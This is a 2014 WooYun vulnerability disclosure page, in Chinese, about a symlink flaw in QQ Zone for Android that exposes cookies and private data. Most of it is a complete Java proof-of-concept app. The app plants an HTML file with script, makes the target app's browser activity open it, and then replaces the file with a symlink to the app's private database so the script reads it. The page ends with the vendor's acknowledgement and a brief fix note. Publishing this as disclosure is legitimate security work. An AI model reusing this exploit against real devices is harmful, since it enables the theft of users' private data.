乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-26: 细节已通知厂商并且等待厂商处理中 2014-05-26: 厂商已经确认,细节仅向厂商公开 2014-05-29: 细节向第三方安全合作伙伴开放 2014-07-20: 细节向核心白帽子及相关领域专家公开 2014-07-30: 细节向普通白帽子公开 2014-08-09: 细节向实习白帽子公开 2014-08-24: 细节向公众公开
QQ空间Android版逻辑缺陷导致隐私泄漏
QQ空间Android版对file域下符号链接限制不当,可导致cookie等用户隐私被窃取
import android.net.Uri;import android.os.Bundle;import android.app.Activity;import android.content.Intent;public class MainActivity extends Activity { public final static String MY_PKG = "com.example.testqzone"; public final static String MY_TMP_DIR = "/data/data/" + MY_PKG + "/tmp/"; public final static String HTML_PATH = MY_TMP_DIR + "A" + Math.random() + ".html"; public final static String TARGET_PKG = "com.qzone"; public final static String TARGET_FILE_PATH = "/data/data/" + TARGET_PKG + "/databases/cfcd208495d565ef66e7dff9f98764da"; public final static String HTML = "<body>" + "<u>Wait a few seconds.</u>" + "<script>" + "var d = document;" + "function doitjs() {" + " var xhr = new XMLHttpRequest;" + " xhr.onload = function() {" + " var txt = xhr.responseText;" + " d.body.appendChild(d.createTextNode(txt));" + " alert(txt);" + " };" + " xhr.open('GET', d.URL);" + " xhr.send(null);" + "}" + "setTimeout(doitjs, 8000);" + "</script>" + "</body>"; @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); doit(); } public void doit() { try { // Create a malicious HTML cmdexec("mkdir " + MY_TMP_DIR); cmdexec("echo \"" + HTML + "\" > " + HTML_PATH); cmdexec("chmod -R 777 " + MY_TMP_DIR); Thread.sleep(1000); // Force Chrome to load the malicious HTML invokeChrome("file://" + HTML_PATH); Thread.sleep(4000); // Replace the HTML with a symlink to Chrome's Cookie file cmdexec("rm " + HTML_PATH); cmdexec("ln -s " + TARGET_FILE_PATH + " " + HTML_PATH); } catch (Exception e) {} } public void invokeChrome(String url) { Intent intent = new Intent(Intent.ACTION_VIEW, Uri.parse(url)); intent.setClassName(TARGET_PKG, "com.tencent.mtt.spcialcall.SpecialCallActivity"); startActivity(intent); } public void cmdexec(String cmd) { try { String[] tmp = new String[] {"/system/bin/sh", "-c", cmd}; Runtime.getRuntime().exec(tmp); } catch (Exception e) {} }}
对符号链接进行限制
危害等级:中
漏洞Rank:10
确认时间:2014-05-26 16:07
非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
暂无